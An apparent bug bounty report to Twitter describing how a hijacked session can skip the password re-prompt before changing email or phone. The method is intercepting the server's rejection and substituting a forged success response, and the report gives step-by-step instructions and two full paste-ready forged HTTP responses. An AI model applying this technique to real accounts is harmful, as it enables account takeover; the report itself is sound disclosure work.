Bypass Password Authentication for updating email and phone number - Security Vulnerability

**Summary:** [Additional requirement for authentication is an extra layer of security for a person's Twitter account. Instead of only entering the password at the time of log in, twitter further Introduces additional layer of security by prompting users to enter their password before attempting to update any crucial Information such as email ID or phone numbers. This additional security measure from twitter provides protection to the victim's account, considering that a victim's session may have been hijacked by a hacker, however, due to this additional layer of security Implemented by twitter the hacker would not be able to change the victim's personal details such as phone number or email id, as they will be prompted to enter the victim's account password In order to make these changes, which will not be known to a hacker (In case of a session hijack) This report is to bring to your attention a security vulnerability that will allow hackers that have hijacked a user's session to bypass the password screen (Without knowing the user's password) that is prompted to a user before trying to update the email ID and phone number under Settings and Privacy -> Accounts.] **Description:** [For users that have had their twitter session hijacked, this security vulnerability would enable a hacker to completely take over a victim's account as they will be able to change the victim's e-mail ID and phone number by bypassing the password screen prompted during the verification process. This will allow the hacker to reset the password either by requesting for a link and/or code on the email/mobile updated by them against the victim's account, therefore resulting in a complete account take over. The security vulnerability is basically related to client side processing that is undertaken based on the response received from the server. For example : Let's say the hacker enters the password and clicks on 'Next' there is a flow token that is generated by the client which is sent to the server. The server would then validate the password and return a response to the client to Indicate whether the next page must be loaded or If there was an error related to the request i.e. 'Wrong password'. The security vulnerability allows for the client request and server response to be Intercepted and manipulated such that even though the hacker may have entered an Incorrect password, the server response can be Intercepted modified to a valid JSON response with the token flow number that was originally sent by the client to the server, therefore leading for twitter to believe that the authentication was successful and bypassing the password screen, thereby providing access to hackers to update the victims' email ID and phone number without the need for additional authentication. ] ## Steps To Reproduce: (Add details for how we can reproduce the issue) With the assumption that the victim's twitter session is 'hijacked' and in a 'logged in' state for the hacker. The below steps must be followed In order to reproduce the security vulnerability. Security Vulnerability #1 - Update Victim's E-mail ID - Bypass password screen 1. Go to Settings and Privacy -> Accounts 2. Click on Email -> Update email address 3. Enter any random password and Click on 'Next' 4. Intercept the request the above request 5. Copy the flow token up to : 6. Forward client request to server and Intercept the response from server to this request 7. Modify the Intercepted Server's Response with the below text **please paste the flow token from step 5 below and remove the [square brackets]** 8. Forward the modified 'Server Response' to the client 9. This will now bypass the password screen irrespective of It being a correct or Incorrect password - You must now 'Enter' your email ID and verify It In order to add the email ID to the victim's account -------------------------------------------COPY FROM BELOW START------------------------------------------------ HTTP/1.1 200 OK access-control-allow-credentials: true access-control-allow-origin: https://twitter.com cache-control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 connection: close content-disposition: attachment; filename=json.json Content-Length: 2732 content-type: application/json; charset=utf-8 date: Mon, 06 Jan 2020 21:12:15 GMT expires: Tue, 31 Mar 1981 05:00:00 GMT last-modified: Mon, 06 Jan 2020 21:12:15 GMT pragma: no-cache server: tsa_k strict-transport-security: max-age=631138519 x-connection-hash: 1d41600d4a1940ad3cab723b3ec0b57a x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-response-time: 308 x-tsa-request-body-time: 1 x-twitter-response-tags: BouncerCompliant x-xss-protection: 0 {"flow_token":"[PASTE FLOW TOKEN HERE]:1","status":"success","subtasks":[{"subtask_id":"EmailAssocEnterEmail","enter_email":{"primary_text":{"text":"Change email","entities":[]},"secondary_text":{"text":"Your current email is ███. What would you like to update it to? Your email is not displayed in your public profile on Twitter.","entities":[]},"hint_text":"Email address","next_link":{"link_type":"subtask","link_id":"next_link","label":"Next","subtask_id":"EmailAssocVerifyEmail"},"skip_link":{"link_type":"abort","link_id":"cancel_link","label":"Cancel"},"discoverability_setting":{"primary_text":{"text":"Let people who have your email address find and connect with you on Twitter. Learn more","entities":[{"from_index":77,"to_index":87,"navigation_link":{"link_type":"web_link","link_id":"open_web_link","label":"learn_more_email_phone_disco_link","url":"https://help.twitter.com/safety-and-security/email-and-phone-discoverability-settings"}}]},"value_type":"boolean","value_identifier":"email_discoverability_setting","value_data":{"boolean_data":{"initial_value":false}}}}},{"subtask_id":"EmailAssocVerifyEmail","email_verification":{"primary_text":{"text":"We sent you a code","entities":[]},"secondary_text":{"text":"Enter it below to verify your email.\t","entities":[]},"detail_text":{"text":"Didn't receive code?","entities":[{"from_index":0,"to_index":20,"navigation_link":{"link_type":"subtask","link_id":"resend_email_verification_link","subtask_id":"DidNotReceiveEmailDialog"}}]},"hint_text":"Verification code","email":{"subtask_data_reference":{"key":"email","subtask_id":"EmailAssocEnterEmail"}},"name":{"subtask_data_reference":{"key":"name","subtask_id":"EmailAssocEnterEmail"}},"next_link":{"link_type":"task","link_id":"next_link","label":"Verify"},"fail_link":{"link_type":"subtask","link_id":"fail_link","subtask_id":"EmailAssocEnterEmail"},"cancel_link":{"link_type":"subtask","link_id":"cancel_link","label":"Cancel","subtask_id":"EmailAssocEnterEmail"},"verification_status_polling_enabled":false}},{"subtask_id":"DidNotReceiveEmailDialog","menu_dialog":{"primary_text":{"text":"Didn’t receive the code?","entities":[]},"primary_action_links":[{"link_type":"subtask","link_id":"email_link","label":"Resend","subtask_navigation_context":{"action":"resend_email"},"subtask_id":"EmailAssocVerifyEmail"}],"cancel_link":{"link_type":"subtask","link_id":"cancel_link","label":"Cancel","subtask_navigation_context":{"action":"cancel_email_dialog"},"subtask_id":"EmailAssocVerifyEmail"},"dismiss_link":{"link_type":"subtask","link_id":"dismiss_link","subtask_navigation_context":{"action":"dismiss_email_dialog"},"subtask_id":"EmailAssocVerifyEmail"}}}]} -------------------------------------------COPY END------------------------------------------------ --------------------------------------------------------------------------------------------------------------------------------------------------------------- Security Vulnerability #2 - Update Victim's phone number - Bypass password screen 1. Go to Settings and Privacy -> Accounts 2. Click on Phone -> Add/Update phone number 3. Enter any random password and Click on 'Next' 4. Intercept the request the above request 5. Copy the flow token up to : 6. Forward client request to server and Intercept the response from server to this request 7. Modify the Intercepted Server's Response with the below text **please paste the flow token from step 5 below and remove the [square brackets]** 8. Forward the modified 'Server Response' to the client 9. This will now bypass the password screen irrespective of It being a correct or Incorrect password - You must now 'Enter' your mobile number and verify It In order to add the phone number to the victim's account -------------------------------------------COPY FROM BELOW START------------------------------------------------ HTTP/1.1 200 OK access-control-allow-credentials: true access-control-allow-origin: https://twitter.com cache-control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 connection: close content-disposition: attachment; filename=json.json Content-Length: 16612 content-type: application/json; charset=utf-8 date: Mon, 06 Jan 2020 21:36:13 GMT expires: Tue, 31 Mar 1981 05:00:00 GMT last-modified: Mon, 06 Jan 2020 21:36:13 GMT pragma: no-cache server: tsa_k strict-transport-security: max-age=631138519 x-connection-hash: be41fa15964cca748cd82c001728c777 x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-response-time: 305 x-tsa-request-body-time: 0 x-twitter-response-tags: BouncerCompliant x-xss-protection: 0 {"flow_token":"[PASTE FLOW TOKEN HERE]:1","status":"success","subtasks":[{"subtask_id":"EnterPhoneForAssociation","enter_phone":{"primary_text":{"text":"Add a phone number","entities":[]},"secondary_text":{"text":"Enter the phone number you’d like to associate with your Twitter account. You’ll get a verification code sent here.","entities":[]},"hint_text":"Your phone number","next_link":{"link_type":"subtask","link_id":"next_link","label":"Next","subtask_id":"PhoneAssociationVerificationAlert"},"skip_link":{"link_type":"abort","link_id":"cancel_link","label":"Cancel"},"discoverability_setting":{"primary_text":{"text":"Let people who have your phone number find and connect with you on Twitter. Learn more","entities":[{"from_index":76,"to_index":86,"navigation_link":{"link_type":"web_link","link_id":"open_web_link","label":"learn_more_email_phone_disco_link","url":"https://help.twitter.com/safety-and-security/email-and-phone-discoverability-settings"}}]},"value_type":"boolean","value_identifier":"phone_discoverability_setting","value_data":{"boolean_data":{"initial_value":false}}},"country_codes":[{"id":"AF","text":{"text":"+93 Afghanistan","entities":[]}},{"id":"AL","text":{"text":"+355 Albania","entities":[]}},{"id":"DZ","text":{"text":"+213 Algeria","entities":[]}},{"id":"AS","text":{"text":"+1 American Samoa","entities":[]}},{"id":"AD","text":{"text":"+376 Andorra","entities":[]}},{"id":"AO","text":{"text":"+244 Angola","entities":[]}},{"id":"AI","text":{"text":"+1 Anguilla","entities":[]}},{"id":"AG","text":{"text":"+1 Antigua and Barbuda","entities":[]}},{"id":"AR","text":{"text":"+54 Argentina","entities":[]}},{"id":"AM","text":{"text":"+374 Armenia","entities":[]}},{"id":"AW","text":{"text":"+297 Aruba","entities":[]}},{"id":"AU","text":{"text":"+61 Australia","entities":[]}},{"id":"AT","text":{"text":"+43 Austria","entities":[]}},{"id":"AZ","text":{"text":"+994 Azerbaijan","entities":[]}},{"id":"BS","text":{"text":"+1 Bahamas","entities":[]}},{"id":"BH","text":{"text":"+973 Bahrain","entities":[]}},{"id":"BD","text":{"text":"+880 Bangladesh","entities":[]}},{"id":"BB","text":{"text":"+1 Barbados","entities":[]}},{"id":"BY","text":{"text":"+375 Belarus","entities":[]}},{"id":"BE","text":{"text":"+32 Belgium","entities":[]}},{"id":"BZ","text":{"text":"+501 Belize","entities":[]}},{"id":"BJ","text":{"text":"+229 Benin","entities":[]}},{"id":"BM","text":{"text":"+1 Bermuda","entities":[]}},{"id":"BT","text":{"text":"+975 Bhutan","entities":[]}},{"id":"BO","text":{"text":"+591 Bolivia","entities":[]}},{"id":"BQ","text":{"text":"+599 Bonaire, Sint Eustatius and Saba","entities":[]}},{"id":"BA","text":{"text":"+387 Bosnia and Herzegovina","entities":[]}},{"id":"BW","text":{"text":"+267 Botswana","entities":[]}},{"id":"BR","text":{"text":"+55 Brazil","entities":[]}},{"id":"VG","text":{"text":"+1 British Virgin Islands","entities":[]}},{"id":"BN","text":{"text":"+673 Brunei","entities":[]}},{"id":"BG","text":{"text":"+359 Bulgaria","entities":[]}},{"id":"BF","text":{"text":"+226 Burkina Faso","entities":[]}},{"id":"BI","text":{"text":"+257 Burundi","entities":[]}},{"id":"KH","text":{"text":"+855 Cambodia","entities":[]}},{"id":"CM","text":{"text":"+237 Cameroon","entities":[]}},{"id":"CA","text":{"text":"+1 Canada","entities":[]}},{"id":"CV","text":{"text":"+238 Cape Verde","entities":[]}},{"id":"KY","text":{"text":"+1 Cayman Islands","entities":[]}},{"id":"CF","text":{"text":"+236 Central African Republic","entities":[]}},{"id":"TD","text":{"text":"+235 Chad","entities":[]}},{"id":"CL","text":{"text":"+56 Chile","entities":[]}},{"id":"CN","text":{"text":"+86 China","entities":[]}},{"id":"CO","text":{"text":"+57 Colombia","entities":[]}},{"id":"KM","text":{"text":"+269 Comoros","entities":[]}},{"id":"CG","text":{"text":"+242 Congo","entities":[]}},{"id":"CK","text":{"text":"+682 Cook Islands","entities":[]}},{"id":"CR","text":{"text":"+506 Costa Rica","entities":[]}},{"id":"HR","text":{"text":"+385 Croatia","entities":[]}},{"id":"CU","text":{"text":"+53 Cuba","entities":[]}},{"id":"CW","text":{"text":"+599 Curaçao","entities":[]}},{"id":"CY","text":{"text":"+357 Cyprus","entities":[]}},{"id":"CZ","text":{"text":"+420 Czech Republic","entities":[]}},{"id":"CI","text":{"text":"+225 Côte d'Ivoire","entities":[]}},{"id":"DK","text":{"text":"+45 Denmark","entities":[]}},{"id":"DJ","text":{"text":"+253 Djibouti","entities":[]}},{"id":"DM","text":{"text":"+1 Dominica","entities":[]}},{"id":"DO","text":{"text":"+1 Dominican Republic","entities":[]}},{"id":"EC","text":{"text":"+593 Ecuador","entities":[]}},{"id":"EG","text":{"text":"+20 Egypt","entities":[]}},{"id":"SV","text":{"text":"+503 El Salvador","entities":[]}},{"id":"GQ","text":{"text":"+240 Equatorial Guinea","entities":[]}},{"id":"ER","text":{"text":"+291 Eritrea","entities":[]}},{"id":"EE","text":{"text":"+372 Estonia","entities":[]}},{"id":"ET","text":{"text":"+251 Ethiopia","entities":[]}},{"id":"FK","text":{"text":"+500 Falkland Islands","entities":[]}},{"id":"FO","text":{"text":"+298 Faroe Islands","entities":[]}},{"id":"FJ","text":{"text":"+679 Fiji","entities":[]}},{"id":"FI","text":{"text":"+358 Finland","entities":[]}},{"id":"FR","text":{"text":"+33 France","entities":[]}},{"id":"GF","text":{"text":"+594 French Guiana","entities":[]}},{"id":"PF","text":{"text":"+689 French Polynesia","entities":[]}},{"id":"GA","text":{"text":"+241 Gabon","entities":[]}},{"id":"GM","text":{"text":"+220 Gambia","entities":[]}},{"id":"GE","text":{"text":"+995 Georgia","entities":[]}},{"id":"DE","text":{"text":"+49 Germany","entities":[]}},{"id":"GH","text":{"text":"+233 Ghana","entities":[]}},{"id":"GI","text":{"text":"+350 Gibraltar","entities":[]}},{"id":"GR","text":{"text":"+30 Greece","entities":[]}},{"id":"GL","text":{"text":"+299 Greenland","entities":[]}},{"id":"GD","text":{"text":"+1 Grenada","entities":[]}},{"id":"GP","text":{"text":"+590 Guadeloupe","entities":[]}},{"id":"GU","text":{"text":"+1 Guam","entities":[]}},{"id":"GT","text":{"text":"+502 Guatemala","entities":[]}},{"id":"GN","text":{"text":"+224 Guinea","entities":[]}},{"id":"GW","text":{"text":"+245 Guinea-Bissau","entities":[]}},{"id":"GY","text":{"text":"+592 Guyana","entities":[]}},{"id":"HT","text":{"text":"+509 Haiti","entities":[]}},{"id":"HN","text":{"text":"+504 Honduras","entities":[]}},{"id":"HK","text":{"text":"+852 Hong Kong","entities":[]}},{"id":"HU","text":{"text":"+36 Hungary","entities":[]}},{"id":"IS","text":{"text":"+354 Iceland","entities":[]}},{"id":"IN","text":{"text":"+91 India","entities":[]}},{"id":"ID","text":{"text":"+62 Indonesia","entities":[]}},{"id":"IR","text":{"text":"+98 Iran","entities":[]}},{"id":"IQ","text":{"text":"+964 Iraq","entities":[]}},{"id":"IE","text":{"text":"+353 Ireland","entities":[]}},{"id":"IM","text":{"text":"+44 Isle Of Man","entities":[]}},{"id":"IL","text":{"text":"+972 Israel","entities":[]}},{"id":"IT","text":{"text":"+39 Italy","entities":[]}},{"id":"JM","text":{"text":"+1 Jamaica","entities":[]}},{"id":"JP","text":{"text":"+81 Japan","entities":[]}},{"id":"JE","text":{"text":"+44 Jersey","entities":[]}},{"id":"JO","text":{"text":"+962 Jordan","entities":[]}},{"id":"KZ","text":{"text":"+7 Kazakhstan","entities":[]}},{"id":"KE","text":{"text":"+254 Kenya","entities":[]}},{"id":"KI","text":{"text":"+686 Kiribati","entities":[]}},{"id":"KW","text":{"text":"+965 Kuwait","entities":[]}},{"id":"KG","text":{"text":"+996 Kyrgyzstan","entities":[]}},{"id":"LA","text":{"text":"+856 Laos","entities":[]}},{"id":"LV","text":{"text":"+371 Latvia","entities":[]}},{"id":"LB","text":{"text":"+961 Lebanon","entities":[]}},{"id":"LS","text":{"text":"+266 Lesotho","entities":[]}},{"id":"LR","text":{"text":"+231 Liberia","entities":[]}},{"id":"LY","text":{"text":"+218 Libya","entities":[]}},{"id":"LI","text":{"text":"+423 Liechtenstein","entities":[]}},{"id":"LT","text":{"text":"+370 Lithuania","entities":[]}},{"id":"LU","text":{"text":"+352 Luxembourg","entities":[]}},{"id":"MO","text":{"text":"+853 Macao","entities":[]}},{"id":"MK","text":{"text":"+389 Macedonia","entities":[]}},{"id":"MG","text":{"text":"+261 Madagascar","entities":[]}},{"id":"MW","text":{"text":"+265 Malawi","entities":[]}},{"id":"MY","text":{"text":"+60 Malaysia","entities":[]}},{"id":"MV","text":{"text":"+960 Maldives","entities":[]}},{"id":"ML","text":{"text":"+223 Mali","entities":[]}},{"id":"MT","text":{"text":"+356 Malta","entities":[]}},{"id":"MQ","text":{"text":"+596 Martinique","entities":[]}},{"id":"MR","text":{"text":"+222 Mauritania","entities":[]}},{"id":"MU","text":{"text":"+230 Mauritius","entities":[]}},{"id":"YT","text":{"text":"+262 Mayotte","entities":[]}},{"id":"MX","text":{"text":"+52 Mexico","entities":[]}},{"id":"FM","text":{"text":"+691 Micronesia","entities":[]}},{"id":"MD","text":{"text":"+373 Moldova","entities":[]}},{"id":"MC","text":{"text":"+377 Monaco","entities":[]}},{"id":"MN","text":{"text":"+976 Mongolia","entities":[]}},{"id":"ME","text":{"text":"+382 Montenegro","entities":[]}},{"id":"MS","text":{"text":"+1 Montserrat","entities":[]}},{"id":"MA","text":{"text":"+212 Morocco","entities":[]}},{"id":"MZ","text":{"text":"+258 Mozambique","entities":[]}},{"id":"MM","text":{"text":"+95 Myanmar","entities":[]}},{"id":"NA","text":{"text":"+264 Namibia","entities":[]}},{"id":"NR","text":{"text":"+674 Nauru","entities":[]}},{"id":"NP","text":{"text":"+977 Nepal","entities":[]}},{"id":"NL","text":{"text":"+31 Netherlands","entities":[]}},{"id":"NC","text":{"text":"+687 New Caledonia","entities":[]}},{"id":"NZ","text":{"text":"+64 New Zealand","entities":[]}},{"id":"NI","text":{"text":"+505 Nicaragua","entities":[]}},{"id":"NE","text":{"text":"+227 Niger","entities":[]}},{"id":"NG","text":{"text":"+234 Nigeria","entities":[]}},{"id":"NF","text":{"text":"+672 Norfolk Island","entities":[]}},{"id":"MP","text":{"text":"+1 Northern Mariana Islands","entities":[]}},{"id":"NO","text":{"text":"+47 Norway","entities":[]}},{"id":"OM","text":{"text":"+968 Oman","entities":[]}},{"id":"PK","text":{"text":"+92 Pakistan","entities":[]}},{"id":"PS","text":{"text":"+970 Palestine","entities":[]}},{"id":"PA","text":{"text":"+507 Panama","entities":[]}},{"id":"PG","text":{"text":"+675 Papua New Guinea","entities":[]}},{"id":"PY","text":{"text":"+595 Paraguay","entities":[]}},{"id":"PE","text":{"text":"+51 Peru","entities":[]}},{"id":"PH","text":{"text":"+63 Philippines","entities":[]}},{"id":"PL","text":{"text":"+48 Poland","entities":[]}},{"id":"PT","text":{"text":"+351 Portugal","entities":[]}},{"id":"PR","text":{"text":"+1 Puerto Rico","entities":[]}},{"id":"QA","text":{"text":"+974 Qatar","entities":[]}},{"id":"RE","text":{"text":"+262 Reunion","entities":[]}},{"id":"RO","text":{"text":"+40 Romania","entities":[]}},{"id":"RU","text":{"text":"+7 Russia","entities":[]}},{"id":"RW","text":{"text":"+250 Rwanda","entities":[]}},{"id":"KN","text":{"text":"+1 Saint Kitts And Nevis","entities":[]}},{"id":"LC","text":{"text":"+1 Saint Lucia","entities":[]}},{"id":"MF","text":{"text":"+590 Saint Martin","entities":[]}},{"id":"VC","text":{"text":"+1 Saint Vincent And The Grenadines","entities":[]}},{"id":"WS","text":{"text":"+685 Samoa","entities":[]}},{"id":"SM","text":{"text":"+378 San Marino","entities":[]}},{"id":"ST","text":{"text":"+239 Sao Tome And Principe","entities":[]}},{"id":"SA","text":{"text":"+966 Saudi Arabia","entities":[]}},{"id":"SN","text":{"text":"+221 Senegal","entities":[]}},{"id":"RS","text":{"text":"+381 Serbia","entities":[]}},{"id":"SC","text":{"text":"+248 Seychelles","entities":[]}},{"id":"SL","text":{"text":"+232 Sierra Leone","entities":[]}},{"id":"SG","text":{"text":"+65 Singapore","entities":[]}},{"id":"SX","text":{"text":"+1 Sint Maarten (Dutch part)","entities":[]}},{"id":"SK","text":{"text":"+421 Slovakia","entities":[]}},{"id":"SI","text":{"text":"+386 Slovenia","entities":[]}},{"id":"SB","text":{"text":"+677 Solomon Islands","entities":[]}},{"id":"SO","text":{"text":"+252 Somalia","entities":[]}},{"id":"ZA","text":{"text":"+27 South Africa","entities":[]}},{"id":"KR","text":{"text":"+82 South Korea","entities":[]}},{"id":"SS","text":{"text":"+211 South Sudan","entities":[]}},{"id":"ES","text":{"text":"+34 Spain","entities":[]}},{"id":"LK","text":{"text":"+94 Sri Lanka","entities":[]}},{"id":"SR","text":{"text":"+597 Suriname","entities":[]}},{"id":"SZ","text":{"text":"+268 Swaziland","entities":[]}},{"id":"SE","text":{"text":"+46 Sweden","entities":[]}},{"id":"CH","text":{"text":"+41 Switzerland","entities":[]}},{"id":"TW","text":{"text":"+886 Taiwan","entities":[]}},{"id":"TJ","text":{"text":"+992 Tajikistan","entities":[]}},{"id":"TZ","text":{"text":"+255 Tanzania","entities":[]}},{"id":"TH","text":{"text":"+66 Thailand","entities":[]}},{"id":"CD","text":{"text":"+243 The Democratic Republic Of Congo","entities":[]}},{"id":"TL","text":{"text":"+670 Timor-Leste","entities":[]}},{"id":"TG","text":{"text":"+228 Togo","entities":[]}},{"id":"TO","text":{"text":"+676 Tonga","entities":[]}},{"id":"TT","text":{"text":"+1 Trinidad and Tobago","entities":[]}},{"id":"TN","text":{"text":"+216 Tunisia","entities":[]}},{"id":"TR","text":{"text":"+90 Turkey","entities":[]}},{"id":"TM","text":{"text":"+993 Turkmenistan","entities":[]}},{"id":"TC","text":{"text":"+1 Turks And Caicos Islands","entities":[]}},{"id":"TV","text":{"text":"+688 Tuvalu","entities":[]}},{"id":"VI","text":{"text":"+1 U.S. Virgin Islands","entities":[]}},{"id":"UG","text":{"text":"+256 Uganda","entities":[]}},{"id":"UA","text":{"text":"+380 Ukraine","entities":[]}},{"id":"AE","text":{"text":"+971 United Arab Emirates","entities":[]}},{"id":"GB","text":{"text":"+44 United Kingdom","entities":[]}},{"id":"US","text":{"text":"+1 United States","entities":[]}},{"id":"UY","text":{"text":"+598 Uruguay","entities":[]}},{"id":"UZ","text":{"text":"+998 Uzbekistan","entities":[]}},{"id":"VU","text":{"text":"+678 Vanuatu","entities":[]}},{"id":"VE","text":{"text":"+58 Venezuela","entities":[]}},{"id":"VN","text":{"text":"+84 Vietnam","entities":[]}},{"id":"XK","text":{"text":"+383 XK","entities":[]}},{"id":"YE","text":{"text":"+967 Yemen","entities":[]}},{"id":"ZM","text":{"text":"+260 Zambia","entities":[]}},{"id":"ZW","text":{"text":"+263 Zimbabwe","entities":[]}}],"default_country_code":"IN"}},{"subtask_id":"PhoneAssociationVerificationAlert","alert_dialog":{"next_link":{"link_type":"subtask","link_id":"next_link","label":"OK","subtask_id":"PhoneAssociationVerification"},"primary_text":{"text":"Verify phone","entities":[]},"secondary_text":{"text":"We'll send your verification code to . Standard SMS, call and data fees may apply.","entities":[{"from_index":37,"to_index":37,"subtask_data_reference":{"key":"phone_number","subtask_id":"EnterPhoneForAssociation"}}]},"cancel_link":{"link_type":"subtask","link_id":"cancel_link","label":"Edit","subtask_id":"EnterPhoneForAssociation"}}},{"subtask_id":"PhoneAssociationVerification","phone_verification":{"primary_text":{"text":"We sent you a code","entities":[]},"secondary_text":{"text":"Enter it below to verify .","entities":[{"from_index":25,"to_index":25,"subtask_data_reference":{"key":"phone_number","subtask_id":"EnterPhoneForAssociation"}}]},"detail_text":{"text":"Didn't receive code?","entities":[{"from_index":0,"to_index":20,"navigation_link":{"link_type":"subtask","link_id":"resend_phone_verification_link","subtask_id":"DidNotReceiveSMSDialog"}}]},"hint_text":"Verification code","phone_number":{"subtask_data_reference":{"key":"phone_number","subtask_id":"EnterPhoneForAssociation"}},"next_link":{"link_type":"task","link_id":"next_link","label":"Verify"},"fail_link":{"link_type":"subtask","link_id":"fail_link","subtask_id":"EnterPhoneForAssociation"},"cancel_link":{"link_type":"subtask","link_id":"cancel_link","label":"Cancel","subtask_id":"EnterPhoneForAssociation"},"auto_verify_hint_text":"Waiting for SMS to arrive...","send_via_voice":false,"phone_country_code":{"subtask_data_reference":{"key":"country_code","subtask_id":"EnterPhoneForAssociation"}}}},{"subtask_id":"DidNotReceiveSMSDialog","menu_dialog":{"primary_text":{"text":"Didn’t receive the code?","entities":[]},"primary_action_links":[{"link_type":"subtask","link_id":"sms_link","label":"Resend","subtask_navigation_context":{"action":"resend_sms"},"subtask_id":"PhoneAssociationVerification"}],"cancel_link":{"link_type":"task","link_id":"skip_link","label":"Cancel"},"dismiss_link":{"link_type":"subtask","link_id":"dismiss_link","subtask_navigation_context":{"action":"dismiss_phone_dialog"},"subtask_id":"PhoneAssociationVerification"}}}]} -------------------------------------------COPY END------------------------------------------------ ## Impact: [This a serious security vulnerability, as It could lead to a hacker completely taking over the user's account by overriding twitter's security protocol as they could use this technique to bypass the password screen which would enable them to update the email ID and the phone number against the victim's account thereby providing the hacker with complete authority/access over the victim's account] ## Supporting Material/References: [Please see attached the video for demonstration and steps to reproduce this security vulnerability] ## Impact An attacker could potentially capitalize on the 'hijacked' session and completely take over the victim's twitter account by modifying the email id and mobile phone number of the user without having to authenticate themselves with the correct password. As a result, It would defeat Twitter's additional layer of security i.e. password prompt and would lead to the user being locked out from ever accessing their twitter account again.